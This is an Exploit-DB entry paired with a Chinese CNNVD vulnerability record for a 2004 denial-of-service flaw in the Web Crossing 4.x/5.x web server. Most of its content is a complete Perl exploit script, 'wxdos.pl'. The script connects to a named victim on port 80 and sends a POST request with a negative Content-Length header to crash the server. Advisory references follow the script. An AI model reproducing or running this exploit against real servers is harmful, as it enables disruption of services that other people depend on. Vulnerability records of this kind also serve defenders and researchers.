https://www.exploit-db.com/exploits/23648
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-136

WebCrossing4.x和5.x存在漏洞。远程攻击者可以通过发送一个HTTPPOST请求导致服务拒绝（崩溃），该请求带有一个超大或者值为负数的目录长度，可能导致一个整数除以零。

source: http://www.securityfocus.com/bid/9576/info

The Web Crossing Web Server component has been reported prone to a remote denial of service vulnerability. It has been reported that the issue will present itself when the affected web server receives a malicious HTTP request that contains negative values for certain fields in the HTTP header.

#########################################################################
#!/usr/bin/perl -w
#
#########################################################################
#!/usr/bin/perl -w
#
# Web Crossing 4.x5.x Denial of Service Exploit
#  [ Bad 'Content-Length' Header Bug ]
#
#  - by Peter Winter-Smith [[email protected]]

use IO::Socket;

if(!($ARGV[0]))
{
 print "Usage: wxdos.pl <victim>n";
 exit;
}

print "Web Crossing 4.x\5.x Denial of Service Exploitn" .
      "t[ Bad 'Content-Length' Header Bug ]n" .
      "t[[email protected]]nn";

$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
                             PeerPort=>"80")
                            or die "Unable to connect to $ARGV[0] on " .
                             "port 80";


$DoS    = "POST / HTTP/1.1rn" .
          "Content-Length: -1rnrn";

print $victim $DoS;

print "[+] Evil request made to target server ... Waiting...!n";

sleep(4);

close($victim);

print "[+] Done!n";
exit;
#########################################################################

来源:BUGTRAQ
名称:20040203WebCrossing4.x/5.xDenialofServiceVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107586518120516&w;=2
来源:XF
名称:webcrossing-contentlength-post-dos(15022)
链接:http://xforce.iss.net/xforce/xfdb/15022
来源:BID
名称:9576
链接:http://www.securityfocus.com/bid/9576